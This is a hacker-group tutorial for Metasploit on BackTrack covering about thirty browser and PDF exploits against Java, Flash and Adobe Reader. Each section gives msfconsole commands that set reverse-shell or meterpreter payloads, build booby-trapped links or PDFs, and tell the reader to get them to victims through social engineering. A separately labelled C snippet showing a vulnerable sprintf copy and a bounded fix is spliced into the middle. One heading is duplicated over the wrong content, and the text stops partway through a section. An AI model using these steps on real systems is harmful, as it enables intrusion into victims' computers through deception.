[Type text] Page 1
IriIriISIrIsT.Ir Page 1
Back Track Tutorials
How to Attack on Remote PC With Applications Vulnerabilities
By : Red H4t V!per
© All Right Reserved For IrIsT Security Team
Contact :
© Copy Right :
All Right Reserved For IrIsT Security Team - Behnam Abbasi
Vanda
Special Thanks To :
Am!r , C0dex , B3HZ4D , TaK.FaNaR , 0x0ptim0us , Mr.XHat
Skote_Vahshat , (^_^)
Gr33TZ To : IrIsT , TBH , 3xp1r3 , KurdHackTeam
Introduction :
This paper shows how to exploit application vulnerabilities and gain access to a remote PC with Metasploit on BackTrack.
It is assumed that you are familiar enough with the Linux operating system and the Metasploit software,
so we go straight to the attack topic.
Thanks to all of you for reading this article.
Attacking a Remote Windows PC using the Java Signed Applet Method :
This exploit dynamically creates a .jar file via the Msf::Exploit::Java mixin, then signs it. The resulting signed applet is presented to the victim via a web page with an applet tag. The victim's JVM will pop up a dialog asking if they trust the signed applet. On older versions the dialog will display the value of CERTCN in the "Publisher" line. Newer JVMs display "UNKNOWN" when the signature is not trusted (i.e., it is not signed by a trusted CA). The SigningCert option allows you to provide a trusted code signing cert, the values in which will override CERTCN. If SigningCert is not given, a randomly generated self-signed cert will be used. Either way, once the user clicks "Run", the applet executes with full user permissions.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/multi/browser/java_signed_applet
Now type show options, then set the options below:
msf exploit(java_signed_applet) > set payload windows/meterpreter/reverse_tcp
msf exploit(java_signed_applet) > set appletname adobe (the main applet's class name)
msf exploit(java_signed_applet) > set certcn adobe player (value for the certificate)
msf exploit(java_signed_applet) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(java_signed_applet) > set srvport 80 (the local port to listen on; default: 8080)
msf exploit(java_signed_applet) > set uripath adobeclipes (the URL to use for this exploit)
msf exploit(java_signed_applet) > set lport 4443
msf exploit(java_signed_applet) > exploit
Now the URL you should give to your victim is http://192.168.42.131/adobeclipes
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use "sessions -l" and the session number to connect to the session.
Attacking a Remote Windows PC using Sun Java Command Line Injection :
This module exploits a flaw in the Web Start component of the Sun Java Runtime Environment. The arguments passed to Java Web Start are not properly validated, allowing injection of arbitrary arguments to the JVM. By utilizing the lesser known -J option, an attacker can take advantage of the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method allows an attacker to execute arbitrary code in the context of an unsuspecting browser user. In order for this module to work, it must be run as root on a server that does not serve SMB. Additionally, the target host must have the Web Client service (WebDAV Mini-Redirector) enabled.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/browser/java_ws_vmargs
msf exploit(java_ws_vmargs) > set payload windows/meterpreter/reverse_tcp
msf exploit(java_ws_vmargs) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(java_ws_vmargs) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(java_ws_vmargs) > set srvport 80
msf exploit(java_ws_vmargs) > set uripath / (the URL to use for this exploit)
msf exploit(java_ws_vmargs) > exploit
Now the URL you should give to your victim is http://192.168.42.131/
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use "sessions -l" and the session number to connect to the session.
Attacking a Remote Windows PC using the Java AtomicReferenceArray Type Violation Vulnerability :
This module exploits a vulnerability due to the fact that AtomicReferenceArray uses the Unsafe class to store a reference in an array directly, which may violate type safety if not used properly. This allows a way to escape the JRE sandbox and load additional classes in order to perform malicious operations.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/browser/java_atomicreferencearray
msf exploit(java_atomicreferencearray) > set payload generic/shell_reverse_tcp
msf exploit(java_atomicreferencearray) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(java_atomicreferencearray) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(java_atomicreferencearray) > set uripath yes (the URL to use for this exploit)
msf exploit(java_atomicreferencearray) > exploit
Now the URL you should give to your victim is http://192.168.42.131:8080/yes
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use "sessions -l" and the session number to connect to the session.
Attacking a Remote Windows PC using the Java Trusted Chain Method :
This module exploits a vulnerability in the Java Runtime Environment that allows an untrusted method to run in a privileged context. The vulnerability affects version 6 prior to update 19 and version 5 prior to update 23.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/browser/java_trusted_chain
msf exploit(java_trusted_chain) > set payload java/meterpreter/reverse_tcp
msf exploit(java_trusted_chain) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(java_trusted_chain) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(java_trusted_chain) > set uripath jta (the URL to use for this exploit)
msf exploit(java_trusted_chain) > exploit
Now the URL you should give to your victim is http://192.168.42.131:8080/jta
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use "sessions -l" and the session number to connect to the session.
Attacking a Remote Windows PC using the Java RMIConnectionImpl Deserialization Privilege Escalation Exploit :
This module exploits a vulnerability in the Java Runtime Environment that allows a MarshalledObject containing a custom class loader to be deserialized under a privileged context. The vulnerability affects version 6 prior to update 19 and version 5 prior to update 23.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/browser/java_rmi_connection_impl
msf exploit(java_rmi_connection_impl) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(java_rmi_connection_impl) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(java_rmi_connection_impl) > set uripath bip (the URL to use for this exploit)
msf exploit(java_rmi_connection_impl) > exploit
Now the URL you should give to your victim is http://192.168.42.131:8080/bip
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use "sessions -l" and the session number to connect to the session.
Attacking a Remote Windows PC using the Sun Java Runtime Buffer Overflow :
This module exploits a flaw in the new plugin component of the Sun Java Runtime Environment before v6 Update 22. By specifying specific parameters to the new plugin, an attacker can cause a stack-based buffer overflow and execute arbitrary code. When the new plugin is invoked with a "launchjnlp" parameter, it will copy the contents of the "docbase" parameter to a stack buffer using the "sprintf" function. A string of 396 bytes is enough to overflow the 256 byte stack buffer and overwrite some local variables as well as the saved return address. NOTE: The string being copied is first passed through "WideCharToMultiByte". Due to this, only characters which have a valid localized multibyte representation are allowed. Invalid characters will be replaced with question marks ('?').
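As an added example (not the tutorial's own code and not Metasploit's), the shape of the flaw described above in C: a 256-byte stack buffer filled by sprintf() from a caller-controlled "docbase" string, beside a bounded version that rejects any value that does not fit. The 256 and 396 figures come from the page; the function names and the sample strings are assumptions made up for this example.

```c
/* Added example: the unbounded copy behind the docbase overflow, and a
 * hardened copy that checks the length first.  Function names and sample
 * inputs are constructed for this illustration. */
#include <stdio.h>
#include <string.h>

#define DOCBASE_BUF 256   /* size of the stack buffer named on the page */

/* "Before": the vulnerable pattern.  sprintf() has no idea how big buf is,
 * so a docbase of 256 bytes or more (the page uses 396) runs past the end
 * of the stack buffer.  Kept here only for comparison; never call it with
 * untrusted input, and the test below does not call it at all. */
void copy_docbase_vulnerable(const char *docbase)
{
    char buf[DOCBASE_BUF];
    sprintf(buf, "%s", docbase);   /* unbounded write into a 256-byte buffer */
    (void)buf;
}

/* "After": reject before copying.  The value must fit in outsz bytes
 * together with its terminating NUL; otherwise nothing is written.
 * Returns 0 on success and -1 when the input was rejected. */
int copy_docbase_safe(char *out, size_t outsz, const char *docbase)
{
    /* memchr stops at the first NUL, so this never scans more than outsz
     * bytes of the input.  No NUL within outsz bytes means it cannot fit. */
    const char *nul = memchr(docbase, '\0', outsz);
    if (nul == NULL)
        return -1;
    memcpy(out, docbase, (size_t)(nul - docbase) + 1);
    return 0;
}

/* Mirrors the page's numbers: builds a constructed docbase of n 'A'
 * characters and reports 1 if the safe copy accepts it, 0 if it rejects
 * it, -1 if n is too large for the scratch buffer. */
int docbase_accepted(size_t n)
{
    char input[512];
    char out[DOCBASE_BUF];
    if (n >= sizeof input)
        return -1;
    memset(input, 'A', n);
    input[n] = '\0';
    return copy_docbase_safe(out, sizeof out, input) == 0;
}

/* Round trip on a short constructed value: 1 if the safe copy accepted it
 * and reproduced it exactly. */
int safe_copy_roundtrip(void)
{
    const char *sample = "http://example.invalid/docs/";  /* constructed */
    char out[DOCBASE_BUF];
    return copy_docbase_safe(out, sizeof out, sample) == 0
        && strcmp(out, sample) == 0;
}

int main(void)
{
    printf("255 bytes accepted: %d\n", docbase_accepted(255));  /* 1: fits with NUL */
    printf("256 bytes accepted: %d\n", docbase_accepted(256));  /* 0: no room for NUL */
    printf("396 bytes accepted: %d\n", docbase_accepted(396));  /* 0: the page's overflow length */
    printf("round trip ok: %d\n", safe_copy_roundtrip());
    return 0;
}
```

The bounded version makes the page's 396-byte case a rejected input instead of an overwritten return address; the '?' substitution the note describes does not change the length check, since it maps one character to one byte.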
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/browser/java_docbase_bof
msf exploit(java_docbase_bof) > set payload windows/meterpreter/reverse_tcp
msf exploit(java_docbase_bof) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(java_docbase_bof) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(java_docbase_bof) > set uripath jab (the URL to use for this exploit)
msf exploit(java_docbase_bof) > exploit
Now the URL you should give to your victim is http://192.168.42.131:8080/jab
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use "sessions -l" and the session number to connect to the session.
Attacking a Remote Windows PC using Sun Java Applet2ClassLoader Remote Code Execution :
This module exploits a vulnerability in the Java Runtime Environment that allows an attacker to run an applet outside of the Java sandbox. When an applet is invoked with: 1. a "codebase" parameter that points at a trusted directory, and 2. a "code" parameter that is a URL that does not contain any dots, the applet will run outside of the sandbox. This vulnerability affects JRE prior to version 6 update 24.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/browser/java_codebase_trust
msf exploit(java_codebase_trust) > set payload java/meterpreter/reverse_tcp
msf exploit(java_codebase_trust) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(java_codebase_trust) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(java_codebase_trust) > set uripath jt (the URL to use for this exploit)
msf exploit(java_codebase_trust) > exploit
Now the URL you should give to your victim is http://192.168.42.131:8080/jt
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use "sessions -l" and the session number to connect to the session.
Attacking a Remote Windows PC using Sun Java Web Start Execution :
This module exploits a vulnerability in the Java Runtime Environment that allows an attacker to escape the Java sandbox. By injecting a parameter into a Java call within the BasicServiceImpl class, the default Java sandbox policy file can be overwritten. The vulnerability affects version 6 prior to update 22. NOTE: Exploiting this vulnerability causes several sinister-looking popup windows saying that Java is "Downloading application."
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/browser/java_basicservice_impl
msf exploit(java_basicservice_impl) > set payload windows/meterpreter/reverse_tcp
msf exploit(java_basicservice_impl) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(java_basicservice_impl) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(java_basicservice_impl) > set uripath jbs (the URL to use for this exploit)
msf exploit(java_basicservice_impl) > exploit
Now the URL you should give to your victim is http://192.168.42.131:8080/jbs
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use "sessions -l" and the session number to connect to the session.
Attacking a Remote Windows PC using the Java Applet Rhino Script Engine :
This module exploits a vulnerability in the Rhino Script Engine that can be used by a Java applet to run arbitrary Java code outside of the sandbox. The vulnerability affects version 7 and version 6 update 27 and earlier, and should work on any browser that supports Java (for example: IE, Firefox, Google Chrome, etc.)
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/browser/java_rhino
msf exploit(java_rhino) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(java_rhino) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(java_rhino) > set target 1 (operating system of the victim PC)
msf exploit(java_rhino) > set uripath jr (the URL to use for this exploit)
msf exploit(java_rhino) > exploit
Now the URL you should give to your victim is http://192.168.42.131:8080/jr
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use "sessions -l" and the session number to connect to the session.
Attacking a Remote Windows PC using the Java MixerSequencer Object GM_Song Structure Handling Vulnerability :
This module exploits a flaw within the handling of MixerSequencer objects in Java 6u18 and before. Exploitation is done by supplying a specially crafted MIDI file within an RMF file. When the MixerSequencer object is used to play the file, the GM_Song structure is populated with a function pointer provided by a SONG block in the RMF. A MIDI block that contains a MIDI file with a specially crafted controller event is used to trigger the vulnerability. When the vulnerability is triggered, "ebx" points to a fake event in the MIDI file which stores the shellcode. A "jmp ebx" from msvcr71.dll is used to make the exploit reliable across Java updates.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/browser/java_mixer_sequencer
msf exploit(java_mixer_sequencer) > set payload windows/meterpreter/reverse_tcp
msf exploit(java_mixer_sequencer) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(java_mixer_sequencer) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(java_mixer_sequencer) > set uripath jm (the URL to use for this exploit)
msf exploit(java_mixer_sequencer) > exploit
Now the URL you should give to your victim is http://192.168.42.131:8080/jm
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use "sessions -l" and the session number to connect to the session.
Attacking a Remote Windows PC using Sun Java Calendar Deserialization Privilege Escalation :
This module exploits a flaw in the deserialization of Calendar objects in the Sun JVM. The payload can be either a native payload, which is generated as an executable and dropped/executed on the target, or a shell from within the Java applet in the target browser. The affected Java versions are JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16 and earlier, SDK and JRE 1.4.2_18 and earlier (SDK and JRE 1.3.1 are not affected).
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/browser/java_calendar_deserialize
msf exploit(java_calendar_deserialize) > set payload java/meterpreter/reverse_tcp
msf exploit(java_calendar_deserialize) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(java_calendar_deserialize) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(java_calendar_deserialize) > set uripath jc (the URL to use for this exploit)
msf exploit(java_calendar_deserialize) > exploit
Now the URL you should give to your victim is http://192.168.42.131:8080/jc
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use "sessions -l" and the session number to connect to the session.
Attacking a Remote Windows PC using the Sun Java JRE getSoundbank File Overflow :
This module exploits a flaw in the getSoundbank function in the Sun JVM. The payload is serialized and passed to the applet via PARAM tags. It must be a native payload. The affected Java versions are JDK and JRE 6 Update 16 and earlier, JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and earlier, and SDK and JRE 1.3.1_26 and earlier. NOTE: Although all of the above versions are reportedly vulnerable, only 1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/multi/browser/java_getsoundbank_bof
msf exploit(java_getsoundbank_bof) > set payload generic/shell_reverse_tcp
msf exploit(java_getsoundbank_bof) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(java_getsoundbank_bof) > set uripath js (the URL to use for this exploit)
msf exploit(java_getsoundbank_bof) > exploit
Now the URL you should give to your victim is http://192.168.42.131:8080/js
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use "sessions -l" and the session number to connect to the session.
Attacking a Remote Windows PC using the Sun Java JRE AWT setDiffICM Buffer Overflow :
This module exploits a flaw in the setDiffICM function in the Sun JVM. The payload is serialized and passed to the applet via PARAM tags. It must be a native payload. The affected Java versions are JDK and JRE 6 Update 16 and earlier, JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and earlier, and SDK and JRE 1.3.1_26 and earlier. NOTE: Although all of the above versions are reportedly vulnerable, only 1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/browser/java_setdifficm_bof
msf exploit(java_setdifficm_bof) > set payload generic/shell_reverse_tcp
msf exploit(java_setdifficm_bof) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(java_setdifficm_bof) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(java_setdifficm_bof) > set uripath rb (the URL to use for this exploit)
msf exploit(java_setdifficm_bof) > exploit
Now the URL you should give to your victim is http://192.168.42.131:8080/rb
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use "sessions -l" and the session number to connect to the session.
Attacking a Remote Windows PC using Sun Java Web Start Plugin Command Line Argument Injection :
This module exploits a flaw in the Web Start Plugin component of Sun Java Web Start. The arguments passed to Java Web Start are not properly validated. By passing the lesser known -J option, an attacker can pass arbitrary options directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed by Ruben Santamarta, an attacker can execute arbitrary code in the context of an unsuspecting browser user. This vulnerability was originally discovered independently by both Ruben Santamarta and Tavis Ormandy. Tavis reported that all versions since version 6 Update 10 "are believed to be affected by this vulnerability." In order for this module to work, it must be run as root on a server that does not serve SMB. Additionally, the target host must have the Web Client service (WebDAV Mini-Redirector) enabled.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/browser/java_ws_arginject_altjvm
msf exploit(java_ws_arginject_altjvm) > set payload windows/meterpreter/reverse_tcp
msf exploit(java_ws_arginject_altjvm) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(java_ws_arginject_altjvm) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(java_ws_arginject_altjvm) > exploit
Now the URL you should give to your victim is http://192.168.42.131/
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use "sessions -l" and the session number to connect to the session.
Attacking a Remote Windows PC using Java Applet JAX-WS Remote Code Execution :
This module abuses the JAX-WS classes from a Java applet to run arbitrary Java code outside of the sandbox, as exploited in the wild in November of 2012. The vulnerability affects Java version 7u7 and earlier.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/multi/browser/java_jre17_jaxws
msf exploit(java_jre17_jaxws) > set payload java/shell_reverse_tcp
msf exploit(java_jre17_jaxws) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(java_jre17_jaxws) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(java_jre17_jaxws) > set uripath / (the URL to use for this exploit)
msf exploit(java_jre17_jaxws) > exploit
Now the URL you should give to your victim is http://192.168.42.131:8080/
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use "sessions -l" and the session number to connect to the session.
Attacking a Remote Windows PC using Java 7 Applet Remote Code Execution :
The exploit takes advantage of two issues in JDK 7: the ClassFinder and MethodFinder.findMethod(). Both were newly introduced in JDK 7. ClassFinder is a replacement for Class.forName back in JDK 6. It allows untrusted code to obtain a reference and have access to a restricted package in JDK 7, which can be used to abuse sun.awt.SunToolkit (a restricted package). With sun.awt.SunToolkit, we can actually invoke getField() by abusing findMethod() in Statement.invokeInternal() (but getField() must be public, and that is not always the case in JDK 6) in order to access Statement.acc's private field, modify the AccessControlContext, and then disable the SecurityManager. Once the SecurityManager is disabled, we can execute arbitrary Java code. Our exploit has been tested successfully against multiple platforms, including: IE, Firefox, Safari, Chrome; Windows, Ubuntu, OS X, Solaris, etc.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/multi/browser/java_jre17_exec
msf exploit(java_jre17_exec) > set payload java/shell_reverse_tcp
msf exploit(java_jre17_exec) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(java_jre17_exec) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(java_jre17_exec) > set uripath / (the URL to use for this exploit)
msf exploit(java_jre17_exec) > exploit
Now the URL you should give to your victim is http://192.168.42.131:8080/
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use "sessions -l" and the session number to connect to the session.
Attacking a Remote Windows PC using Java Applet Field Bytecode Verifier Cache Remote Code Execution :
This module exploits a vulnerability in the HotSpot bytecode verifier where an invalid optimization of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checks. This allows a way to escape the JRE sandbox and load additional classes in order to perform malicious operations.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/multi/browser/java_verifier_field_access
msf exploit(java_verifier_field_access) > set payload java/shell_reverse_tcp
msf exploit(java_verifier_field_access) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(java_verifier_field_access) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(java_verifier_field_access) > set uripath / (the URL to use for this exploit)
msf exploit(java_verifier_field_access) > exploit
Now the URL you should give to your victim is http://192.168.42.131:8080/
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use "sessions -l" and the session number to connect to the session.
Attacking a Remote Windows PC using Java Applet Field Bytecode Verifier Cache Remote Code Execution :
This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player before 11.3.300.271. By supplying a corrupt font file used by the SWF, it is possible to gain arbitrary remote code execution under the context of the user, as exploited in the wild.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/browser/adobe_flash_otf_font
msf exploit(adobe_flash_otf_font) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(adobe_flash_otf_font) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(adobe_flash_otf_font) > set uripath flu (the URL to use for this exploit)
msf exploit(adobe_flash_otf_font) > exploit
Now the URL you should give to your victim is http://192.168.42.131:8080/flu
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use "sessions -l" and the session number to connect to the session.
Attacking a Remote Windows PC using Adobe Flash Player 11.3 Font Parsing Code Execution :
This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player before 11.3.300.271. By supplying a corrupt font file used by the SWF, it is possible to gain arbitrary remote code execution under the context of the user, as exploited in the wild.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/browser/adobe_flash_otf_font
msf exploit(adobe_flash_otf_font) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_otf_font) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(adobe_flash_otf_font) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(adobe_flash_otf_font) > set uripath fpu (the URL to use for this exploit)
msf exploit(adobe_flash_otf_font) > exploit
Now the URL you should give to your victim is http://192.168.42.131:8080/fpu
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use "sessions -l" and the session number to connect to the session.
Attacking a Remote Windows PC using Adobe Flash Player Object Type Confusion :
This module exploits a vulnerability found in Adobe Flash Player. By supplying a corrupt AMF0 "_error" response, it is possible to gain arbitrary remote code execution under the context of the user. This vulnerability has been exploited in the wild as part of the "World Uyghur Congress Invitation.doc" e-mail attack. According to the advisory, 10.3.183.19 and 11.x before 11.2.202.235 are affected.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/browser/adobe_flash_rtmp
msf exploit(adobe_flash_rtmp) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_rtmp) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(adobe_flash_rtmp) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(adobe_flash_rtmp) > set uripath / (the URL to use for this exploit)
msf exploit(adobe_flash_rtmp) > exploit
Now the URL you should give to your victim is http://192.168.42.131:8080/
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use "sessions -l" and the session number to connect to the session.
Attacking a Remote Windows PC using the Adobe util.printf() Buffer Overflow :
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional < 8.1.3. By creating a specially crafted PDF that contains a malformed util.printf() entry, an attacker may be able to execute arbitrary code.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/fileformat/adobe_utilprintf
msf exploit(adobe_utilprintf) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_utilprintf) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(adobe_utilprintf) > set filename book.pdf
msf exploit(adobe_utilprintf) > exploit
After we successfully generate the malicious PDF file, it will be stored on your local computer at
/root/.msf4/local/book.pdf
Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit
Now send your book.pdf file to the victim; as soon as they download and open it, you can access a meterpreter shell on the victim's computer. Use "sessions -l" and the session number to connect to the session.
Attacking a Remote Windows PC using the Adobe Doc.media.newPlayer Use After Free Vulnerability :
This module exploits a use-after-free vulnerability in Adobe Reader and Adobe Acrobat Professional versions up to and including 9.2.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/browser/adobe_media_newplayer
msf exploit(adobe_media_newplayer) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_media_newplayer) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(adobe_media_newplayer) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(adobe_media_newplayer) > set uripath ad (the URL to use for this exploit)
msf exploit(adobe_media_newplayer) > exploit
Now the URL you should give to your victim is http://192.168.42.131:8080/ad
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use "sessions -l" and the session number to connect to the session.
Attacking a Remote Windows PC using the Adobe Reader U3D Memory Corruption Vulnerability :
This module exploits a vulnerability in the U3D handling within versions 9.x through 9.4.6 and 10 through 10.1.1 of Adobe Reader. The vulnerability is due to the use of uninitialized memory. Arbitrary code execution is achieved by embedding specially crafted U3D data into a PDF document. A heap spray via JavaScript is used in order to ensure that the memory used by the invalid pointer issue is controlled.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/fileformat/adobe_reader_u3d
Msf exploit (adobe_reader_u3d)>set payload windows/meterpreter/reverse_tcp
Msf exploit (adobe_reader_u3d)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (adobe_reader_u3d)>set filename learning.pdf
Msf exploit (adobe_reader_u3d)>exploit
After we successfully generate the malicious PDF file, it will be stored on your local computer at
/root/.msf4/local/learning.pdf
Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit
Now send your learning.pdf file to the victim; as soon as they download and open it, you can access the meterpreter shell on the victim's computer. Use “sessions -l” and the session number to connect to the session.
Attacking on Remote Windows PC using Adobe PDF Escape EXE Social Engineering :
This module embeds a Metasploit payload into an existing PDF file in a non-standard method. The resulting PDF can be sent to a target as part of a social engineering attack.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
Msf exploit (adobe_pdf_embedded_exe_nojs)>set payload windows/meterpreter/reverse_tcp
Msf exploit (adobe_pdf_embedded_exe_nojs)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (adobe_pdf_embedded_exe_nojs)>set filename parse.pdf
Msf exploit (adobe_pdf_embedded_exe_nojs)>exploit
After we successfully generate the malicious PDF file, it will be stored on your local computer at
/root/.msf4/local/parse.pdf
Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit
Attacking on Remote Windows PC using Adobe Acrobat Bundled LibTIFF Integer Overflow :
This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions 8.0 through 8.2 and 9.0 through 9.3.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/fileformat/adobe_libtiff
Msf exploit (adobe_libtiff)>set payload windows/meterpreter/reverse_tcp
Msf exploit (adobe_libtiff)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (adobe_libtiff)>set filename ebook.pdf
Msf exploit (adobe_libtiff)>exploit
After we successfully generate the malicious PDF file, it will be stored on your local computer at
/root/.msf4/local/ebook.pdf
Now we need to set up a listener with exploit/multi/handler, as in the previous sections, to handle the reverse connection sent by the victim when the exploit executes successfully.
Now send your ebook.pdf file to the victim; as soon as they download and open it, you can access the meterpreter shell on the victim's computer. Use “sessions -l” and the session number to connect to the session.
Attacking on Remote Windows PC using Adobe Collab.collectEmailInfo() Buffer Overflow :
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional 8.1.1. By creating a specially crafted PDF that contains a malformed Collab.collectEmailInfo() call, an attacker may be able to execute arbitrary code.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/fileformat/adobe_collectemailinfo
Msf exploit (adobe_collectemailinfo)>set payload windows/meterpreter/reverse_tcp
Msf exploit (adobe_collectemailinfo)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (adobe_collectemailinfo)>set filename math.pdf
Msf exploit (adobe_collectemailinfo)>exploit
After we successfully generate the malicious PDF file, it will be stored on your local computer at
/root/.msf4/local/math.pdf
Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit
Now send your math.pdf file to the victim; as soon as they download and open it, you can access the meterpreter shell on the victim's computer. Use “sessions -l” and the session number to connect to the session.
Attacking on Remote Windows PC using Adobe CoolType SING Table “uniqueName” Stack Buffer Overflow :
